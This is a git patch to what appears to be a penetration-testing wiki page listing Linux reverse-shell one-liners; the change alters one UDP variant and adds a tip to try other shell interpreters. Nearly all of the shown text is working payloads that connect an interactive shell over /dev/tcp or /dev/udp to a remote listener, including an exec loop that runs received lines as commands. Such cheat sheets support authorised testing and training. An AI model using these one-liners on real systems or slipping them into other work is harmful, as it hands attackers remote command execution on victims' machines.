From 92b8715bb34b222bd53db2def0907863e5357f2c Mon Sep 17 00:00:00 2001 From: CPol Date: Tue, 1 Dec 2020 17:37:29 +0000 Subject: [PATCH] GitBook: [master] one page modified --- shells/shells/linux.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/shells/shells/linux.md b/shells/shells/linux.md index e6d862846..1c2ac3a66 100644 --- a/shells/shells/linux.md +++ b/shells/shells/linux.md @@ -10,11 +10,13 @@ ```bash bash -i >& /dev/tcp// 0>&1 -bash -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP +sh -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP 0<&196;exec 196<>/dev/tcp//; sh <&196 >&196 2>&196 exec 5<>/dev/tcp//; while read line 0<&5; do $line 2>&5 >&5; done ``` +Don't forget to check with others shell : sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, bash + ### Symbol safe shell ```bash